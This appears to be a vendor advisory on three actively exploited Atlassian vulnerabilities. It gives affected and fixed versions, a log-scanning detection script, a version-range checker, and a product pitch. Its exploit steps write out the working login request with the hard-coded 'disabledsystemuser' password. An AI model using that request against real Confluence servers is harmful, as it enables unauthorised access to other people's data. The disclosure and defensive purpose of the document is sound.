
Warning: Atlassian Critical Vulnerabilities Being Actively Exploited- Patch Now!

Atlassian released patches for three critical vulnerabilities. Two of the three flaws affect Confluence Server and Confluence Data Center as well as Bamboo, Bitbucket, Fisheye, Jira and the other products listed below; the third affects only Confluence Server and Data Center. Atlassian is aware that the vulnerabilities are being actively exploited.

The vulnerabilities are tracked as CVE-2022-26136 (Arbitrary Servlet Filter Bypass), CVE-2022-26137 (Additional Servlet Filter Invocation), and CVE-2022-26138 (Default Login). A proof of concept (POC) is available for CVE-2022-26138, “Questions For Confluence – Default Login”. At the time of writing, no POC is available for CVE-2022-26136 or CVE-2022-26137.


Technical Details

CVE-2022-26136, CVE-2022-26137 – By sending a specially crafted HTTP request, an unauthenticated remote attacker may be able to exploit these two flaws to bypass the authentication used by third-party apps, run arbitrary JavaScript code, and get around the browser's cross-origin resource sharing (CORS) mechanism. The vendor has released patches for both flaws.

CVE-2022-26138 – An unauthenticated remote attacker can exploit this vulnerability by using hard-coded credentials. As a result, the attacker obtains a login to Confluence and can access any page that the confluence-users group has access to.

Uninstalling the Questions for Confluence app does not fix this vulnerability, because the account it created remains. Users should delete or disable the “disabledsystemuser” account or apply the vendor's patch.


Steps to Exploit CVE-2022-26138

  1. Send a POST request to the “/dologin.action” endpoint.
  2. Use the POST data “os_username=disabledsystemuser&os_password=disabledsystemuser6708&login=Log+in&os_destination=%2Fhttpvoid.action”.
  3. This POST request logs the sender in to the Confluence Server or Data Center instance.

POST /dologin.action HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

os_username=disabledsystemuser&os_password=disabledsystemuser6708&login=Log+in&os_destination=%2Fhttpvoid.action
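Because the login above is a single POST with a fixed username, the most reliable detection signal is any request attributed to the disabledsystemuser account, correlated with the preceding POST to /dologin.action from the same client. The script below is an added example and is not code from this advisory or from Atlassian. It assumes an access-log line layout in which the authenticated user is the second field (Confluence typically logs it via the X-AUSERNAME response header); the exact layout, the regular expression LINE_RE and the sample log lines are constructed for this example, so adjust LINE_RE to the AccessLogValve pattern configured in your own conf/server.xml.

```python
"""Scan Confluence-style access-log lines for use of the hard-coded
'disabledsystemuser' account exposed by CVE-2022-26138.
Added example, not the advisory's or Atlassian's code. The log layout and
the sample lines are constructed; adapt LINE_RE to your real access-log pattern."""
import re
from typing import Dict, List, Optional, Tuple

# Constructed layout: "YYYY-MM-DD HH:MM:SS user client-ip "METHOD path PROTOCOL" status"
LINE_RE = re.compile(
    r'^(?P<time>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (?P<user>\S+) (?P<ip>\S+) '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})$'
)

FLAGGED_USER = "disabledsystemuser"  # account named in the advisory
LOGIN_PATH = "/dologin.action"       # login endpoint named in the advisory

# Constructed sample: one session as the flagged account, one malformed line,
# one ordinary user session that must not be reported.
SAMPLE_LOG = """\
2022-07-21 10:12:01 - 203.0.113.9 "GET /login.action HTTP/1.1" 200
2022-07-21 10:12:02 - 203.0.113.9 "POST /dologin.action HTTP/1.1" 302
2022-07-21 10:12:03 disabledsystemuser 203.0.113.9 "GET /httpvoid.action HTTP/1.1" 200
2022-07-21 10:12:07 disabledsystemuser 203.0.113.9 "GET /rest/api/content?limit=100 HTTP/1.1" 200
this line is deliberately malformed and must be skipped
2022-07-21 10:16:10 - 198.51.100.7 "POST /dologin.action HTTP/1.1" 302
2022-07-21 10:16:11 alice 198.51.100.7 "GET /index.action HTTP/1.1" 200
2022-07-21 10:16:25 alice 198.51.100.7 "GET /display/ENG/Home HTTP/1.1" 200
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the named fields of one log line, or None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def scan(log_text: str) -> Dict[str, List]:
    """Correlate login POSTs with later requests made as the flagged account.

    Returns {"logins": [(time of the login POST, client ip), ...],
             "requests": ["time ip METHOD path", ...]}.
    Any non-empty result is a finding: the account is meant to be disabled or
    deleted, so it should never appear as the user of a request.
    """
    pending_login: Dict[str, str] = {}  # ip -> time of its most recent POST /dologin.action
    logins: List[Tuple[str, str]] = []
    requests: List[str] = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue  # malformed or unrelated line
        if rec["method"] == "POST" and rec["path"] == LOGIN_PATH:
            pending_login[rec["ip"]] = rec["time"]
        if rec["user"] == FLAGGED_USER:
            requests.append(f'{rec["time"]} {rec["ip"]} {rec["method"]} {rec["path"]}')
            # The first flagged-user request after a login POST from the same
            # client marks that POST as the successful hard-coded login.
            if rec["ip"] in pending_login:
                logins.append((pending_login.pop(rec["ip"]), rec["ip"]))
    return {"logins": logins, "requests": requests}


if __name__ == "__main__":
    result = scan(SAMPLE_LOG)
    for when, ip in result["logins"]:
        print(f"ALERT login as {FLAGGED_USER} from {ip} at {when}")
    for entry in result["requests"]:
        print(f"ALERT {FLAGGED_USER} activity: {entry}")
```

Run it against a real access log by passing the file contents to scan(); because the username comes from the server's own view of the session, the rule still fires when the login POST itself was not captured, and it keeps firing after patching if the account was never deleted.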


Affected Versions

1. CVE-2022-26136, CVE-2022-26137:

  • Atlassian Bamboo Server and Data Center Versions < 7.2.9, 8.0.x < 8.0.9, 8.1.x < 8.1.8, 8.2.x < 8.2.4
  • Atlassian Bitbucket Server and Data Center Versions < 7.6.16, All versions 7.7.x through 7.16.x, 7.17.x < 7.17.8, All versions 7.18.x, 7.19.x < 7.19.5, 7.20.x < 7.20.2, 7.21.x < 7.21.2, 8.0.0, 8.1.0
  • Atlassian Confluence Server and Data Center Versions < 7.4.17, All versions 7.5.x through 7.12.x, 7.13.x < 7.13.7, 7.14.x < 7.14.3, 7.15.x < 7.15.2, 7.16.x < 7.16.4, 7.17.x < 7.17.4, 7.18.0
  • Atlassian Crowd Server and Data Center Versions < 4.3.8, 4.4.x < 4.4.2, 5.0.0
  • Atlassian Crucible Versions < 4.8.10
  • Atlassian Fisheye Versions < 4.8.10
  • Atlassian Jira Server and Data Center Versions < 8.13.22, All versions 8.14.x through 8.19.x, 8.20.x < 8.20.10, All versions 8.21.x, 8.22.x < 8.22.4

Note: 8.22.4 is not affected, but it contains a security bug unrelated to this CVE.

  • Atlassian Jira Service Management Server and Data Center Versions < 4.13.22, All versions 4.14.x through 4.19.x, 4.20.x < 4.20.10, All versions 4.21.x, 4.22.x < 4.22.4

2. CVE-2022-26138:

  • Questions for Confluence App 2.7.34, 2.7.35, 3.0.2 for Confluence Server and Confluence Data Center
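The ranges above mix three notations ("< 7.4.17", "All versions 7.5.x through 7.12.x", a bare "7.18.0"), which is easy to misread when checking an inventory by hand. The script below is an added example, not Atlassian's or this advisory's code: it transcribes the Confluence, Jira and Questions for Confluence ranges from the list above into half-open intervals and checks an installed version against them. The product keys ("confluence", "jira", "questions-for-confluence") and the sample inventory are names and values chosen for this example.

```python
"""Check installed Atlassian product versions against the affected ranges
listed in this advisory. Added example, not Atlassian's or the advisory
author's code; product keys and the sample inventory are chosen for the example."""
from typing import Dict, List, Tuple

Version = Tuple[int, int, int]


def parse_version(text: str) -> Version:
    """Turn 'major.minor.patch' into a comparable tuple; missing parts become 0."""
    parts = [int(p) for p in text.strip().split(".")]
    if not 1 <= len(parts) <= 3:
        raise ValueError(f"unsupported version string: {text!r}")
    while len(parts) < 3:
        parts.append(0)
    return (parts[0], parts[1], parts[2])


# Half-open ranges [low, high): a version is affected when low <= v < high.
# Transcribed from the "Affected Versions" list above:
#   "< 7.4.17"                          -> [0.0.0, 7.4.17)
#   "All versions 7.5.x through 7.12.x" -> [7.5.0, 7.13.0)
#   "7.13.x < 7.13.7"                   -> [7.13.0, 7.13.7)
#   a single affected release "7.18.0"  -> [7.18.0, 7.18.1)
AFFECTED: Dict[str, Dict[str, List[Tuple[str, str]]]] = {
    "CVE-2022-26136/CVE-2022-26137": {
        "confluence": [
            ("0.0.0", "7.4.17"), ("7.5.0", "7.13.0"), ("7.13.0", "7.13.7"),
            ("7.14.0", "7.14.3"), ("7.15.0", "7.15.2"), ("7.16.0", "7.16.4"),
            ("7.17.0", "7.17.4"), ("7.18.0", "7.18.1"),
        ],
        "jira": [
            ("0.0.0", "8.13.22"), ("8.14.0", "8.20.0"), ("8.20.0", "8.20.10"),
            ("8.21.0", "8.22.0"), ("8.22.0", "8.22.4"),
        ],
    },
    "CVE-2022-26138": {
        # Only app releases 2.7.34, 2.7.35 and 3.0.2 are listed as affected.
        "questions-for-confluence": [("2.7.34", "2.7.36"), ("3.0.2", "3.0.3")],
    },
}


def affected_cves(product: str, version: str) -> List[str]:
    """Return the CVE groups whose affected ranges contain `version` for `product`."""
    v = parse_version(version)
    hits: List[str] = []
    for cve, products in AFFECTED.items():
        for low, high in products.get(product, []):
            if parse_version(low) <= v < parse_version(high):
                hits.append(cve)
                break  # one match per CVE group is enough
    return hits


def report(inventory: Dict[str, str]) -> Dict[str, List[str]]:
    """Map every product in an inventory to the CVEs its version is exposed to."""
    return {product: affected_cves(product, ver) for product, ver in inventory.items()}


if __name__ == "__main__":
    # Constructed inventory for demonstration.
    sample = {"confluence": "7.13.6", "jira": "8.22.4", "questions-for-confluence": "2.7.35"}
    for product, cves in report(sample).items():
        print(f"{product} {sample[product]}: {', '.join(cves) or 'not affected'}")
```

The half-open encoding makes the fixed versions in the Solution section fall out naturally: 7.13.7 is the first Confluence 7.13.x release outside its interval, and 8.22.4 the first Jira 8.22.x release outside its interval. Note that the checker only covers the rows transcribed into AFFECTED; add the Bamboo, Bitbucket, Crowd, Crucible, Fisheye and Jira Service Management rows the same way before relying on it for those products.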

Solution

1. CVE-2022-26136, CVE-2022-26137:

  • Atlassian Bamboo Server and Data Center 7.2.x >= 7.2.9, 8.0.x >= 8.0.9, 8.1.x >= 8.1.8, 8.2.x >= 8.2.4, Versions >= 9.0.0
  • Atlassian Bitbucket Server and Data Center 7.6.x >= 7.6.16 (LTS), 7.17.x >= 7.17.8 (LTS), 7.19.x >= 7.19.5, 7.20.x >= 7.20.2, 7.21.x >= 7.21.2 (LTS), 8.0.x >= 8.0.1, 8.1.x >= 8.1.1, Versions >= 8.2.0
  • Atlassian Confluence Server and Data Center 7.4.x >= 7.4.17 (LTS), 7.13.x >= 7.13.7 (LTS), 7.14.x >= 7.14.3, 7.15.x >= 7.15.2, 7.16.x >= 7.16.4, 7.17.x >= 7.17.4, 7.18.x >= 7.18.1
  • Atlassian Crowd Server and Data Center 4.3.x >= 4.3.8, 4.4.x >= 4.4.2, Versions >= 5.0.1
  • Atlassian Crucible Versions >= 4.8.10
  • Atlassian Fisheye Versions >= 4.8.10
  • Atlassian Jira Server and Data Center 8.13.x >= 8.13.22 (LTS), 8.20.x >= 8.20.10 (LTS), 8.22.x >= 8.22.4, Versions >= 9.0.0
  • Atlassian Jira Service Management Server and Data Center 4.13.x >= 4.13.22 (LTS), 4.20.x >= 4.20.10 (LTS), 4.22.x >= 4.22.4, Versions >= 5.0.0

Note: 4.22.5 contains a security vulnerability, so upgrade to 4.22.6.

2. CVE-2022-26138:

  • Solution 1:
    • Upgrade to Questions for Confluence App >= 2.7.38 (requires Confluence 6.13.18 through 7.16.2) or >= 3.0.5 (requires Confluence 7.16.3 and later).

Uninstalling the Questions for Confluence app will not fix this issue: after the app is uninstalled, the disabledsystemuser account is not automatically deleted.

  • Solution 2:
    • Delete or disable the “disabledsystemuser” account.

SanerNow Advanced Vulnerability Management detects Atlassian critical vulnerabilities and fixes them; we strongly recommend applying the security update as soon as possible. Use SanerNow and keep your systems updated and secure.